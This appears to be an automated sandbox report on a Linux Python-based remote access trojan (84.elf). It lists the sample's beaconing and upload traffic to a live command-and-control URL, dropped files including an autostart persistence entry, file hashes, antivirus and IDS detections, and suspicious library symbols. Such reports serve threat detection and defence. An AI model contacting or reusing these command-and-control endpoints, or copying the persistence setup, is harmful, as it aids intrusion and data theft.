Source: unknown	Network traffic detected: HTTP traffic on port 60500 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60500
Source: unknown	Network traffic detected: HTTP traffic on port 60502 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60502
Source: unknown	Network traffic detected: HTTP traffic on port 60504 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60504
Source: unknown	Network traffic detected: HTTP traffic on port 60506 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60506
Source: unknown	Network traffic detected: HTTP traffic on port 60508 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60508
Source: unknown	Network traffic detected: HTTP traffic on port 60510 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60510
Source: unknown	Network traffic detected: HTTP traffic on port 60512 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60512
Source: unknown	Network traffic detected: HTTP traffic on port 60514 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60514
Source: unknown	Network traffic detected: HTTP traffic on port 60516 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60516
Source: unknown	Network traffic detected: HTTP traffic on port 60518 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60518
Source: unknown	Network traffic detected: HTTP traffic on port 60520 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60520
Source: unknown	Network traffic detected: HTTP traffic on port 60522 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60522
Source: unknown	Network traffic detected: HTTP traffic on port 60524 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60524
Source: unknown	Network traffic detected: HTTP traffic on port 60526 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60526
Source: unknown	Network traffic detected: HTTP traffic on port 60528 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60528
Source: unknown	Network traffic detected: HTTP traffic on port 60530 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60530
Source: unknown	Network traffic detected: HTTP traffic on port 60532 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60532
Source: unknown	Network traffic detected: HTTP traffic on port 60534 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60534

ELF contains segments with high entropy indicating compressed/encrypted content

Source: _codecs_cn.so.16.dr

Dropped file: segment LOAD with 7.4298 entropy (max. 8.0)

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/84.elf (PID: 6257)	Queries kernel information via 'uname':	Jump to behavior
Source: /sbin/ldconfig.real (PID: 6259)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uname (PID: 6261)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/find (PID: 6385)	Queries kernel information via 'uname':	Jump to behavior

Source: cacert.pem.16.dr

Binary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd

Executes the "uname" command used to read OS and architecture name

Source: /bin/sh (PID: 6261)

Uname executable: /usr/bin/uname -> uname -p

Jump to behavior

Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
54.171.230.55	unknown	United States	16509	AMAZON-02US	false
84.247.176.126	unknown	Norway	29300	AS-DIRECTCONNECTNO	true
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://84.247.176.126:33548/api/root_265403912816988/hello	true		unknown
http://84.247.176.126:33548/api/root_265403912816988/upload	true		unknown

Name	Type	MD5	SHA1	SHA256
/root/.config/autostart/gvfs.desktop	ASCII text	224C7D117782F33C1CFA3039BA45F41B	229FF33817619DEE8D52F4CCBDBD2AB055BC93F4	8459BFC700490D9F25D1BC62D6163D809E714453622D8EC1DA0DADF797D5888B
/root/.gvfs/84.elf	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=fdb92fd0de3892fc2176220c6694f8eee61d4fa3, stripped	51AC5F4BCFFD208899EBE778C1725579	807C42578F63B569F37A95DC29267EF6C4EC9EEA	684D950494951CDA868A6D1D83E2AB8BAEDB7B4F2E8B079AB94771FB4FABD09A
/tmp/_MEITTIAO4/_cffi_backend.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=a8065860edce18a4dc4eef124c5ef5186663c879, stripped	1F5B27408D0809610ED00EC96A129A4B	089269412CB7547198C8FFB733F4AE5713E46680	C706AEDBD491549032F4FA7C05F7267D7E9DEB703A3D391048AC40633801597D
/tmp/_MEITTIAO4/_codecs_cn.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=514db53237f2feae68b921059fd270fb13189922, stripped	60B7E38E9D3F8347E7D961073FBC131D	57211F099D82579B7A4398FC71AC7D19362C1E01	AC503D3E5DBC185355E9A2B18FB61CD9C9043870F170652214F6AB51DDE0FB70
/tmp/_MEITTIAO4/_codecs_hk.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=97e4ead34d3cee0d9e177d17cfa5b6ce7bd75c9f, stripped	007E7E0F2E0360381DF43B73C1D74A4D	A869C9E2F6A9BAA4778A7554F92270BF2364DBB7	AB208070911A3AE23FF3E3FC12DE33F70CB5CD332F7736810F66863312414052
/tmp/_MEITTIAO4/_codecs_iso2022.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=327305681b550044f7c7d3974bb02e611a5f0d66, stripped	EF5613412BD7F6F0FCF5570C14A5E110	D355AB606B06C1D5CED592919C9EDDFABD342102	EC9652AC7EBD8C34D65DAE576F70DEC4AE011C93E129FEE570FDE7BDF273E94F
/tmp/_MEITTIAO4/_codecs_jp.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=de2862cf1c79ce588099c9e88107338eb803b6b4, stripped	E2FB4F0B1BFB5C1E5078A55C3E82957C	80098186D451B0DB618886DFFC82306D2CA3AB2F	525DC24D7B88D6844208C82E7B335511A3A79FE2A33D7B4C3F931B06C35B702E
/tmp/_MEITTIAO4/_codecs_kr.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=5f5a1cace8de7365928cd69d9c22f52f019b499d, stripped	0E7D119B2BA23C87F820E6CE80BA81FF	D6775C177229DAB62C8344F835078B2345CB11AB	21B28E7E80D70BFE8836331FE3FA7591A20C2EB21101434C22073A1BA65DD008
/tmp/_MEITTIAO4/_codecs_tw.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=9c3201f16e000ddb42f5b2b5ba4eb2cb37701577, stripped	DA62F57440613DFE932C72EF9428F348	C7947F674B4A62C4BF9E38E7477B040DD33009DE	94B5962FD2906B2F5FEE04C32EC874A102A02DD4D7765F511715BF3B72F8A13E
/tmp/_MEITTIAO4/_ctypes.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=9eb871f4b7c1f223cd7928397c52ec239b80d664, stripped	8DEC4EF1CA80BA6789913F077F8EA1A7	3938DBB941395A67A45686FAE8DF43EA4C86BF8B	60BC42B14A630761025F9CCEBE7885116A155DEE9B4C5EB46CC07DB49673A102
/tmp/_MEITTIAO4/_hashlib.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=0f3b6573a291ea8cb69408512d6bdab7de25b832, stripped	6C5C3D7F8A42668419C894BD4261AD77	8815B7ED44E0E560970B16B7FCA7CF6D270049F2	B30EC01C9815552F8C1C03E8559AABF4F14961CAAD47EE3C133893D03ECA5639
/tmp/_MEITTIAO4/_json.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=7465cc284b75613923b1ffde62d40bf513654c26, stripped	E9EBFFDE7BF43906EA6260D355F0F4F2	9154BAA616696AC324BF498D2AC332FB2969C891	620B0A7E08B3887DD16022B06941F76AF91D9609BF455B23FB87083037A28BDC
/tmp/_MEITTIAO4/_multibytecodec.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=b3a1858bab7ca02b90b913ccedb9ce5019a489df, stripped	8CDB93CBB0011BA2D77C6021C8335D00	5126AC3A58B37E8CAFC54141A659F379E736CDDA	3A5FAC43C3630C880A4F7CCE3EFAF59112D028CD12CA1ED573438CCF4154656F
/tmp/_MEITTIAO4/_ssl.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=566fc01e70b4bb52cc045ec9c932495462369c23, stripped	04CA1EB9CFB1BFB22B9B80D640B5597D	8BA7218996C3AFFC93B85516E12EB6B54EFC8F2B	2543617B81449AD0069E0110EE602764C7C22E7BF0C7A8F7665B4691710AE98C
/tmp/_MEITTIAO4/bz2.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=666dba81d12c5e460272832aa9823d35642a949c, stripped	DE36AED33DB0489C28487932E55F53FB	A247A56947D40BF510E15CE3E15A92011CA3E3D8	1B9085A0905720424856E28E128C44EE4EC02D41F8C061E2D25787A9B0705311
/tmp/_MEITTIAO4/certifi/cacert.pem	ASCII text	1CC01760CBAFCF4E529891088046F957	BAE4D52E82F92E5069CAEF47809D337E68B35069	1A85CC17AB39EFE04AC0DD3D0F83E5E0EAC7A1C7462A3AAF882FF84552F154E1
/tmp/_MEITTIAO4/certifi/old_root.pem	ASCII text	5B0321DEC89BBA61D1E800C16198CDF0	625341A52C55FC2A1AB6542CEE850C03E5023ED4	1D3D0A21F68CF37AB45C716A1847AC886C9F9A5496B83D91234F805484B6B2B6
/tmp/_MEITTIAO4/certifi/weak.pem	ASCII text	1E761657D51BBF94DEE66BE6F652054A	0A1DB75552ED3A6754A4148EC09008913130D665	90509D0F1FF4501FC50572B7E1077AEBFE874996D2FA72EE0ED885E90C174562
/tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/PKG-INFO	ASCII text	E9C70E2801CC4C9C8EC79A24E8A3F043	91286DB232234837C3BB84BF5686E7DFB14E6254	F99E9E75A948060DB0471AA454EF9551D4834EA128E22662C1B9DCFC6542B3E6
/tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/dependency_links.txt	very short file (no magic)	68B329DA9893E34099C7D8AD5CB9C940	ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC	01BA4719C80B6FE911B091A7C05124B64EEECE964E09C058EF8F9805DACA546B
/tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/not-zip-safe	very short file (no magic)	68B329DA9893E34099C7D8AD5CB9C940	ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC	01BA4719C80B6FE911B091A7C05124B64EEECE964E09C058EF8F9805DACA546B
/tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/requires.txt	ASCII text	9F9CF9A23A5836265C732FB5FE21CE7E	B46497B3272485F79D143848754CC20D334DD82D	CDE4ED71E93B1C7BE24B096060C784CC7B1CCB40E4411E5871E568200A452CAC
/tmp/_MEITTIAO4/cryptography-2.1.4-py2.7.egg-info/top_level.txt	ASCII text	DDD9B5640A3051BCB8CA132EB1B2FB1B	23FD1DEA71D84FFA4AAFDB08B23C0E80996150DD	402918404E07241A6A22BF9A06A6CE67BD0D95F6DE8CA9C313A3836CD814C308
/tmp/_MEITTIAO4/cryptography.hazmat.bindings._constant_time.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=26260b2f19ee2371e0719b4e5f18680e1737851a, stripped	8FE4E880485426BCFDDF1474E86DDE6E	8793C41E9BF786D4E7FF249571B4B13158B046A1	2F1A945E2754F9CFB9D1BADD21155F3D1681DD3FFBBCE5181FB92407E57D0029
/tmp/_MEITTIAO4/cryptography.hazmat.bindings._openssl.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=0ead53b947feba0a793eddad8400ae751a20c5ba, stripped	D9B0C4C68FEA9595CD856B105AAF20CC	43DBA1C206A1B61783D21A5A3AB268C794A59F1A	726A77432CC7A14DD577360D6274585CA00046665C48D88E90E85D49BE897611
/tmp/_MEITTIAO4/libbz2.so.1.0	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=a4147045409ed969e6f3936f3726726f4719bb40, stripped	27592023A6E4E5FD0E78279DE2C9D34C	E31279667A5265975FE0BCDA6BC7822FAC6E0A3F	60955B0BBB05EF2709638573A1BC7D4E022ADA79E562F8E2B1DB4F108E320F23
/tmp/_MEITTIAO4/libcrypto.so.1.1	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=9349f6f4db60009a53cebe1e05c7056992595a36, stripped	36ED5FAD8165580C48D6497ADEFC8B58	A905A5D4E66247FFB3F28F4C809E5E7EF05497D1	21085650D6C4EC6F8CA98D6FAE582DCDA30C82F70D1833AB888177F338E3D1FD
/tmp/_MEITTIAO4/libexpat.so.1	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=49976d874cc89dfcebf8c5dbf329149bfb40dab5, stripped	8314D75FF4591243187018F96FB3045B	C1A3A0B5BEB8CBDBEC18F991999A034BD8FC419A	F15CDBCE5B1B9A0032FE1AB4E17EEA95601DD8A6404BA20C98A7103E3089676E
/tmp/_MEITTIAO4/libffi.so.6	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=3555b5f599c9787dfddbf9e8df6f706b9044d985, stripped	41D87FC32097366E61FB039ED2EB0754	468FC565E769D020FE935312A1C7DE3BE1E9E925	5A675E4F4E40312EEBBAF9816E009793A394AE9385115BF10B82B83643F84963
/tmp/_MEITTIAO4/libpython2.7.so.1.0	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=8a23a5727eea537355146d8842ad700ee02ac49c, stripped	0F306E41C35A651C0ECEA127D86DD436	6E3090B39C741E9CF3FE9667ED8565C36B1564CF	A6EBDC8989CD703032D0EC653C704C78EBD2054B01B3A49CD18DFF0DF36FDD6C
/tmp/_MEITTIAO4/libreadline.so.7	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=a21b81c1855c6444bc915d9331ab19923fa22c66, stripped	71B5761B43B840EB88D053790DEAF77C	99A53276EAE305A3B55FC9A5172EE5EB597D9C99	F4EEE5647A0A9C876FAD70E3F59CD3331EA824561417D9CAA270A710901C7AAE
/tmp/_MEITTIAO4/libssl.so.1.1	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=ca742a427e7aef089b39c4d773c20ea9e074ce8e, stripped	8FB152D1AEC8DE1958DB7F43B4FFD587	F83B0EE1B0CC89C33A9381CF9DC495298559CA08	5905B53D5DCF4FD7DD11C6AC7E735D7E2F0AF846F5B924579CE7C18D42A38532
/tmp/_MEITTIAO4/libtinfo.so.5	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=d20dc4f7881d9dd170d87fea8eec2a18e4949008, stripped	C339B7D83D239A1DE9EC3BD5CEAA894F	14C64224A3E39923B6EA852A877CE1559A8EFC61	91270AA70F6685DFE255B42230B71ABA6907FD12746AC9D056ADA2264528F443
/tmp/_MEITTIAO4/libz.so.1	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=ef3e006dfe3132a41d4d4dc0e407d6ea658e11c4, stripped	65FD13EF7996608743284FC1210113F1	4531041627B2347E30BF12B5B55EB4D5F2C4946B	219C6C0EFE93BD6D751BBA1E8AE84A162309C665CC5E36BEDDCF295B72F9BC09
/tmp/_MEITTIAO4/pyexpat.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=1fcab5ed75e10a3179769960716824a2e17cb3dd, stripped	D780394752000DA693CEABA97068ED10	684506B46A964B9D81269B5089D03C0B2C945A25	4736B16DD137F99FE212845C69718E8130DFF795E5B3B9FCC523F2B1D8ADEF9F
/tmp/_MEITTIAO4/readline.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=c153df9ee2f261c40fe564523ef2832027b0a8eb, stripped	4CBE6D4F8FAA484BAF5D23B7EB387E6C	FE1B31734DCB92AD10DC3499D3B8A235DEF07B36	A34508A9515423940320A3EFCB3AE7CE64D56AC1DC49636B0E38F25E4C6F15B5
/tmp/_MEITTIAO4/resource.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=c69be48495f38778b2cf5753d7227d244f3de847, stripped	CE76667F2BE8CCC34123E426FE40D0DD	C479DEA3D03C5567B619FCA8CF160A9DA7E03957	5D6432652B75C8327097D4309C0CC4C5582EB15B6EEA120E4179003E1729C2F4
/tmp/_MEITTIAO4/termios.so	ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=8045f1e14355ca6e3ea401dd8e3a49d7142ab8a0, stripped	AB39E9EB3406C564E55DFEBCB9BCF772	FF105F265AD1B222E38FD55975651E5BE93E33EB	F412E3588EF0F8970EF1F779E38E923FADFDC8337E4387294417E2C6FEC32E66
/tmp/list.txt	ASCII text	944A8CBBC5F564F33880F7D9578EAB00	F34EF2EE22D53E09C64502DCB4FF5A1AA8BFB5C3	097BC186B30F289A0812AA9D0CDD4E0E3814E142C460D8615701B960129BE0A9

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 84.elf

Avira: detected

Antivirus detection for dropped file

Source: /root/.gvfs/84.elf

Avira: detection malicious, Label: LINUX/AVI.Agent.xapoa

Multi AV Scanner detection for submitted file

Source: 84.elf	ReversingLabs: Detection: 58%
Source: 84.elf	Virustotal: Detection: 52%			Perma Link

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2829852 - Severity 1 - ETPRO MALWARE Py/Cannibal RAT Checkin M2 : 192.168.2.23:60528 -> 84.247.176.126:33548

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 60486 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60486
Source: unknown	Network traffic detected: HTTP traffic on port 60488 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60488
Source: unknown	Network traffic detected: HTTP traffic on port 60490 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60490
Source: unknown	Network traffic detected: HTTP traffic on port 60492 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60492
Source: unknown	Network traffic detected: HTTP traffic on port 60494 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60494
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60496
Source: unknown	Network traffic detected: HTTP traffic on port 60498 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60498
Source: unknown	Network traffic detected: HTTP traffic on port 60500 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60500
Source: unknown	Network traffic detected: HTTP traffic on port 60502 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60502
Source: unknown	Network traffic detected: HTTP traffic on port 60504 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60504
Source: unknown	Network traffic detected: HTTP traffic on port 60506 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60506
Source: unknown	Network traffic detected: HTTP traffic on port 60508 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60508
Source: unknown	Network traffic detected: HTTP traffic on port 60510 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60510
Source: unknown	Network traffic detected: HTTP traffic on port 60512 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60512
Source: unknown	Network traffic detected: HTTP traffic on port 60514 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60514
Source: unknown	Network traffic detected: HTTP traffic on port 60516 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60516
Source: unknown	Network traffic detected: HTTP traffic on port 60518 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60518
Source: unknown	Network traffic detected: HTTP traffic on port 60520 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60520
Source: unknown	Network traffic detected: HTTP traffic on port 60522 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60522
Source: unknown	Network traffic detected: HTTP traffic on port 60524 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60524
Source: unknown	Network traffic detected: HTTP traffic on port 60526 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60526
Source: unknown	Network traffic detected: HTTP traffic on port 60528 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60528
Source: unknown	Network traffic detected: HTTP traffic on port 60530 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60530
Source: unknown	Network traffic detected: HTTP traffic on port 60532 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60532
Source: unknown	Network traffic detected: HTTP traffic on port 60534 -> 33548
Source: unknown	Network traffic detected: HTTP traffic on port 33548 -> 60534

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.23:60486 -> 84.247.176.126:33548

Source: unknown	TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126
Source: unknown	TCP traffic detected without corresponding DNS query: 84.247.176.126

Source: unknown

Source: libpython2.7.so.1.0.16.dr	String found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: cacert.pem.16.dr	String found in binary or memory: http://www.chambersign.org
Source: libpython2.7.so.1.0.16.dr	String found in binary or memory: http://www.unicode.org/reports/tr44/tr44-4.html).
Source: libpython2.7.so.1.0.16.dr	String found in binary or memory: http://www.unicode.org/reports/tr44/tr44-4.html).xxsubtype
Source: old_root.pem.16.dr	String found in binary or memory: http://www.valicert.com/
Source: PKG-INFO.16.dr	String found in binary or memory: https://codecov.io/github/pyca/cryptography/coverage.svg?branch=master
Source: PKG-INFO.16.dr	String found in binary or memory: https://codecov.io/github/pyca/cryptography?branch=master
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://cryptography.io
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://cryptography.io/
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://cryptography.io/en/latest/installation/
Source: PKG-INFO.16.dr	String found in binary or memory: https://github.com/pyca/cryptography
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://github.com/pyca/cryptography/issues
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://pypi.python.org/pypi/cryptography/
Source: 84.elf, 6254.1.00000000022e8000.0000000002458000.rw-.sdmp, PKG-INFO.16.dr	String found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
Source: PKG-INFO.16.dr	String found in binary or memory: https://travis-ci.org/pyca/cryptography
Source: PKG-INFO.16.dr	String found in binary or memory: https://travis-ci.org/pyca/cryptography.svg?branch=master

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33606
Source: unknown	Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Sample and/or dropped files likely contain functionality related to malicious behavior

Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_get_keylog_callback
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_keylog_callback
Source: libssl.so.1.1.16.dr	ELF static info symbol of dropped file: SSL_SESSION_print_keylog

Sample and/or dropped files contains symbols with suspicious names

Source: _ssl.so.16.dr	ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb
Source: _ssl.so.16.dr	ELF static info symbol of dropped file: SSL_CTX_get_default_passwd_cb_userdata
Source: _ssl.so.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb
Source: _ssl.so.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb_userdata
Source: cryptography.hazmat.bindings._openssl.so.16.dr	ELF static info symbol of dropped file: Cryptography_pem_password_cb
Source: cryptography.hazmat.bindings._openssl.so.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb
Source: cryptography.hazmat.bindings._openssl.so.16.dr	ELF static info symbol of dropped file: SSL_CTX_set_default_passwd_cb_userdata
Source: libcrypto.so.1.1.16.dr	ELF static info symbol of dropped file: CMS_RecipientInfo_set0_password
Source: libcrypto.so.1.1.16.dr	ELF static info symbol of dropped file: CMS_add0_recipient_password
Source: libcrypto.so.1.1.16.dr	ELF static info symbol of dropped file: CMS_decrypt_set1_password
Source: libpython2.7.so.1.0.16.dr	ELF static info symbol of dropped file: PyOS_InputHook
Source: libpython2.7.so.1.0.16.dr	ELF static info symbol of dropped file: _PyImportHooks_Init
